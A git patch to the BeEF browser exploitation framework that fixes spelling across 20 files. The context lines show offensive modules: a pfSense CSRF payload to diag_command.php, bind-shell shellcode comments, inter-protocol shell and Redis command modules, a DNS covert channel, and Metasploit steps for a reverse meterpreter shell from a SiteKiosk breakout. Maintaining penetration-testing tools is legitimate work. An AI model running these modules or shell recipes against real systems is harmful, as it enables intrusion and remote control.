From cc862ae82fbb1a98bd4e4011737d938812153138 Mon Sep 17 00:00:00 2001 From: zinduolis Date: Mon, 10 Nov 2025 20:39:51 +1000 Subject: [PATCH] Fix typos --- core/api.rb | 2 +- extensions/admin_ui/classes/session.rb | 2 +- extensions/admin_ui/media/javascript/ext-all.js | 2 +- extensions/metasploit/rpcclient.rb | 4 ++-- .../browser/webcam_permission_check/cameraCheck.as | 2 +- .../shellcode_sources/linux/x64/stage64.nasm | 2 +- .../beefbind/shellcode_sources/linux/x86/stage.nasm | 2 +- .../windows/src/block_shell_pipes.asm | 6 +++--- .../mozilla_nsiprocess_interface/command.js | 2 +- .../pfsense_2.3.2_reverse_root_shell_csrf/x.js | 2 +- .../ipec/inter_protocol_posix_bindshell/module.rb | 2 +- modules/ipec/inter_protocol_redis/config.yaml | 2 +- modules/ipec/inter_protocol_redis/module.rb | 2 +- .../ipec/inter_protocol_win_bindshell/config.yaml | 2 +- modules/ipec/inter_protocol_win_bindshell/module.rb | 2 +- modules/ipec/s2c_dns_tunnel/command.js | 12 ++++++------ modules/ipec/s2c_dns_tunnel/config.yaml | 2 +- modules/misc/iframe_sniffer/command.js | 4 ++-- .../ADC/f5_bigip_cookie_disclosure/command.js | 4 ++-- .../sitekiosk_breakout/config.yaml | 2 +- 20 files changed, 30 insertions(+), 30 deletions(-) diff --git a/core/api.rb b/core/api.rb index 26ef93a03..0e4531aac 100644 --- a/core/api.rb +++ b/core/api.rb @@ -29,7 +29,7 @@ module BeEF # def register(owner, clss, method, params = []) unless verify_api_path(clss, method) - print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}" + print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}" return end diff --git a/extensions/admin_ui/classes/session.rb b/extensions/admin_ui/classes/session.rb index 6571c169a..d54883313 100644 --- a/extensions/admin_ui/classes/session.rb +++ b/extensions/admin_ui/classes/session.rb @@ -38,7 +38,7 @@ module BeEF end # - # set teh auth_timestamp + # set the auth_timestamp # def set_auth_timestamp(time) @auth_timestamp = time diff --git a/extensions/admin_ui/media/javascript/ext-all.js b/extensions/admin_ui/media/javascript/ext-all.js index b5a11e118..ffd5ca37f 100644 --- a/extensions/admin_ui/media/javascript/ext-all.js +++ b/extensions/admin_ui/media/javascript/ext-all.js @@ -14307,7 +14307,7 @@ Ext.data.DataProxy.Error = Ext.extend(Ext.Error, {constructor:function (b, a) { this.arg = a; Ext.Error.call(this, b) }, name:"Ext.data.DataProxy"}); -Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Recieved an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}}); +Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Received an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}}); Ext.data.Request = function (a) { Ext.apply(this, a) }; diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb index eaf991d21..a7502c0f9 100644 --- a/extensions/metasploit/rpcclient.rb +++ b/extensions/metasploit/rpcclient.rb @@ -14,7 +14,7 @@ module BeEF unless @config.key?('host') || @config.key?('uri') || @config.key?('port') || @config.key?('user') || @config.key?('pass') - print_error 'There is not enough information to initalize Metasploit connectivity at this time' + print_error 'There is not enough information to initialize Metasploit connectivity at this time' print_error 'Please check your options in config.yaml to verify that all information is present' BeEF::Core::Configuration.instance.set('beef.extension.metasploit.enabled', false) BeEF::Core::Configuration.instance.set('beef.extension.metasploit.loaded', false) @@ -137,7 +137,7 @@ module BeEF res = super(@config['user'], @config['pass']) unless res - print_error '[Metasploit] Could not authenticate to Metasploit RPC sevrice.' + print_error '[Metasploit] Could not authenticate to Metasploit RPC service.' return false end diff --git a/modules/browser/webcam_permission_check/cameraCheck.as b/modules/browser/webcam_permission_check/cameraCheck.as index a929be8cd..b2161cb87 100644 --- a/modules/browser/webcam_permission_check/cameraCheck.as +++ b/modules/browser/webcam_permission_check/cameraCheck.as @@ -24,7 +24,7 @@ package { if (!this._cam) { - //Either the camera is not available or some other error has occured + //Either the camera is not available or some other error has occurred ExternalInterface.call("naPermissions"); } else if (this._cam.muted) { diff --git a/modules/exploits/beefbind/shellcode_sources/linux/x64/stage64.nasm b/modules/exploits/beefbind/shellcode_sources/linux/x64/stage64.nasm index 2489775d3..9278c42dd 100755 --- a/modules/exploits/beefbind/shellcode_sources/linux/x64/stage64.nasm +++ b/modules/exploits/beefbind/shellcode_sources/linux/x64/stage64.nasm @@ -165,7 +165,7 @@ search: je found ;cmd= found inc rbx dec rcx - jrcxz notfound ;cmd= not in recieved buffer + jrcxz notfound ;cmd= not in received buffer jmp search ;search some more found: xor rdi, rdi diff --git a/modules/exploits/beefbind/shellcode_sources/linux/x86/stage.nasm b/modules/exploits/beefbind/shellcode_sources/linux/x86/stage.nasm index eabd9d214..f86c3ff0f 100644 --- a/modules/exploits/beefbind/shellcode_sources/linux/x86/stage.nasm +++ b/modules/exploits/beefbind/shellcode_sources/linux/x86/stage.nasm @@ -169,7 +169,7 @@ search: je found ;cmd= found inc ebx dec ecx - jecxz notfound ;cmd= not in recieved buffer + jecxz notfound ;cmd= not in received buffer jmp search ;search some more found: diff --git a/modules/exploits/beefbind/shellcode_sources/windows/src/block_shell_pipes.asm b/modules/exploits/beefbind/shellcode_sources/windows/src/block_shell_pipes.asm index 33e807866..fd4c00a25 100644 --- a/modules/exploits/beefbind/shellcode_sources/windows/src/block_shell_pipes.asm +++ b/modules/exploits/beefbind/shellcode_sources/windows/src/block_shell_pipes.asm @@ -26,7 +26,7 @@ shell: pop ecx ; Set ECX for the loop push_loop: ; push esi ; push a null dword - loop push_loop ; keep looping untill we have pushed enough nulls + loop push_loop ; keep looping until we have pushed enough nulls mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure @@ -34,8 +34,8 @@ push_loop: ; push esp ; Push the pointer to the PROCESS_INFORMATION Structure push eax ; Push the pointer to the STARTUPINFO Structure push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent - push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent - push esi ; We dont specify any dwCreationFlags + push esi ; The lpEnvironment is NULL so the new process will have the same environment as its parent + push esi ; We don't specify any dwCreationFlags inc esi ; Increment ESI to be one push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent dec esi ; Decrement ESI back down to zero diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js index 65b611120..f1de015e9 100644 --- a/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js @@ -18,7 +18,7 @@ beef.execute(function() { process.init(lFile); process.run(false,['/c', command_str],2); } catch (e) { - result = "an unexpected error occured"; + result = "an unexpected error occurred"; } beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result); diff --git a/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js b/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js index 2bc450651..668b77fe9 100644 --- a/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js +++ b/modules/exploits/pfsense/pfsense_2.3.2_reverse_root_shell_csrf/x.js @@ -57,7 +57,7 @@ function makeCSRF(token){ // Final CSRF attack with right referer (because executed in the context) // and with right token captured above var response = ajax('/diag_command.php', 'POST', 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token); - // Finally, redirect back to the intial hooked page + // Finally, redirect back to the initial hooked page document.location=decodeURIComponent(redir); } diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index b713835a8..eab391985 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -48,7 +48,7 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command { 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' }, { 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '4444' }, { 'name' => 'command_timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' }, - { 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type' => 'textarea', + { 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to separate commands', 'type' => 'textarea', 'value' => 'echo ID: ; id', 'width' => '200px' }, { 'name' => 'result_size', 'ui_label' => 'Result Size', 'description' => 'Expected maximum size of the result in bytes', 'value' => '1024' } ] diff --git a/modules/ipec/inter_protocol_redis/config.yaml b/modules/ipec/inter_protocol_redis/config.yaml index 1f388c680..bfc7a6421 100644 --- a/modules/ipec/inter_protocol_redis/config.yaml +++ b/modules/ipec/inter_protocol_redis/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "IPEC" name: "Redis" - description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the Redis commands are not returned to BeEF.

Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines." + description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the Redis commands are not returned to BeEF.

Note: Use '\\n' to separate Redis commands and '\\\\n' for new lines." authors: ["bcoles"] target: working: ["FF", "C"] diff --git a/modules/ipec/inter_protocol_redis/module.rb b/modules/ipec/inter_protocol_redis/module.rb index 7d026f8de..3d03d5dcb 100644 --- a/modules/ipec/inter_protocol_redis/module.rb +++ b/modules/ipec/inter_protocol_redis/module.rb @@ -10,7 +10,7 @@ class Inter_protocol_redis < BeEF::Core::Command { 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' }, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6379' }, { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' }, - { 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.", + { 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to separate Redis commands and '\\\\n' for new lines.", 'type' => 'textarea', 'value' => cmd, 'width' => '200px' } ] end diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml index 1ae162fae..84806b2a4 100644 --- a/modules/ipec/inter_protocol_win_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "IPEC" name: "Bindshell (Windows)" - description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: ampersands are required to seperate commands." + description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: ampersands are required to separate commands." authors: ["bcoles", "wade"] target: working: ["FF", "C"] diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index f57d0cc97..46c62ea02 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb @@ -15,7 +15,7 @@ class Inter_protocol_win_bindshell < BeEF::Core::Command { 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' }, { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '4444' }, { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' }, - { 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type' => 'textarea', + { 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to separate commands', 'type' => 'textarea', 'value' => 'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width' => '200px' } ] end diff --git a/modules/ipec/s2c_dns_tunnel/command.js b/modules/ipec/s2c_dns_tunnel/command.js index 4aa7f3f60..1fbd3c0d0 100644 --- a/modules/ipec/s2c_dns_tunnel/command.js +++ b/modules/ipec/s2c_dns_tunnel/command.js @@ -5,14 +5,14 @@ // /* -This JavaScript retreives data from a server via DNS covert channel. +This JavaScript retrieves data from a server via DNS covert channel. A remote controlled domain with a custom DNS server implementing covert channel logic is required. BeEF supports this feature via Server-to-Client DNS Tunnel extension. -The initial concept of the DNS covert channell and its implementation are described in the following literature: +The initial concept of the DNS covert channel and its implementation are described in the following literature: - K.Born. Browser-Based Covert Data Exfiltration. http://arxiv.org/ftp/arxiv/papers/1004/1004.4357.pdf -- W. Alkorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091 +- W. Alcorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091 */ beef.execute(function() { @@ -29,7 +29,7 @@ beef.execute(function() { var bit_transfered = new Array(); var timing = new Array(); - // Do the DNS query by reqeusting an image + // Do the DNS query by requesting an image send_query = function(fqdn, msg, byte, bit) { var img = new Image; var fport = ""; @@ -51,7 +51,7 @@ beef.execute(function() { } }; - // Construct DNS names based on Active Directory SRV resource records pattern and resolv them via send_query function + // Construct DNS names based on Active Directory SRV resource records pattern and resolve them via send_query function // See http://technet.microsoft.com/en-us/library/cc961719.aspx function get_byte(msg, byte) { bit_transfered[msg][byte] = 0; @@ -71,7 +71,7 @@ beef.execute(function() { } } - // Construct random sring + // Construct random string function getRandomStr(n){ return Math.random().toString(36).slice(2, 2 + Math.max(1, Math.min(n, 12))); } diff --git a/modules/ipec/s2c_dns_tunnel/config.yaml b/modules/ipec/s2c_dns_tunnel/config.yaml index 99bae2aac..9ea9e3d16 100644 --- a/modules/ipec/s2c_dns_tunnel/config.yaml +++ b/modules/ipec/s2c_dns_tunnel/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "IPEC" name: "DNS Tunnel: Server-to-Client" - description: "This module retreives data sending by server over DNS covert channel (DNS tunnel).

A payload name and message are taken as input. The message is sent as a bitstream, decoded, and then can be accessed via Window object property specified in payload name parameter.

Note: To use this feature you should enable S2C DNS Tunnel extension." + description: "This module retrieves data sent by the server over DNS covert channel (DNS tunnel).

A payload name and message are taken as input. The message is sent as a bitstream, decoded, and then can be accessed via Window object property specified in payload name parameter.

Note: To use this feature you should enable S2C DNS Tunnel extension." authors: ["dnkolegov"] target: working: "All" \ No newline at end of file diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js index 43cc40e67..c8bb4d457 100644 --- a/modules/misc/iframe_sniffer/command.js +++ b/modules/misc/iframe_sniffer/command.js @@ -10,7 +10,7 @@ beef.execute(function() { var anchorsToCheck = '<%= @anchorsToCheck %>'; var arrayOfAnchorsToCheck = []; - //the anchors should be seperated with ',' + //the anchors should be separated with ',' //remove tabs, newlines, carriage returns and spaces anchorsToCheck = anchorsToCheck.replace(/[ \t\r\n]/g,''); arrayOfAnchorsToCheck = anchorsToCheck.split(','); @@ -61,7 +61,7 @@ beef.execute(function() { poll(); } else { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occured!'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occurred!'); } }, 100); }; diff --git a/modules/network/ADC/f5_bigip_cookie_disclosure/command.js b/modules/network/ADC/f5_bigip_cookie_disclosure/command.js index 0c42766a7..261f175ec 100644 --- a/modules/network/ADC/f5_bigip_cookie_disclosure/command.js +++ b/modules/network/ADC/f5_bigip_cookie_disclosure/command.js @@ -69,7 +69,7 @@ beef.execute(function() { BIGipCookieValue = m[0].split('=')[1]; result = 'BigIP_cookie_name=' + BIGipCookieName; - // Retreive pool name via cookie name + // Retrieve pool name via cookie name if (BIGipCookieName.match(/^BIGipServer/) !== null) { poolName = BIGipCookieName.split('BIGipServer')[1]; result += '&pool_name=' + poolName; @@ -84,6 +84,6 @@ beef.execute(function() { backend = f5CookieDecode(BIGipCookieValue); result += '&host=' + backend.host + '&port=' + backend.port; } - else result = 'result=BigIP coookie not found' + else result = 'result=BigIP cookie not found' beef.net.send('<%= @command_url %>', <%= @command_id %>, result); }); diff --git a/modules/social_engineering/sitekiosk_breakout/config.yaml b/modules/social_engineering/sitekiosk_breakout/config.yaml index ac37a9baa..c55172075 100644 --- a/modules/social_engineering/sitekiosk_breakout/config.yaml +++ b/modules/social_engineering/sitekiosk_breakout/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: ["Social Engineering"] name: "SiteKiosk Breakout" - description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!
Before launching the module, do the following on Metasploit:
use exploit/windows/misc/psh_web_delivery
set URIPATH /psh
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z

After executing the module, follow this steps:
Click Save
Enter shell:ProgramFiles in the Save Dialogs adressbar
Navigate to C:\\Users\\Public\\Downloads
Save the file
After the Download is finished click on execute
Profit" + description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!
Before launching the module, do the following on Metasploit:
use exploit/windows/misc/psh_web_delivery
set URIPATH /psh
set PAYLOAD windows/meterpreter/reverse_https
set LHOST x.x.x.x
set LPORT 443
set ExitOnSession false
set AutoRunScript post/windows/manage/smart_migrate
exploit -j -z

After executing the module, follow this steps:
Click Save
Enter shell:ProgramFiles in the Save Dialogs address bar
Navigate to C:\\Users\\Public\\Downloads
Save the file
After the Download is finished click on execute
Profit" authors: ["insertscript"] target: user_notify: ["IE"]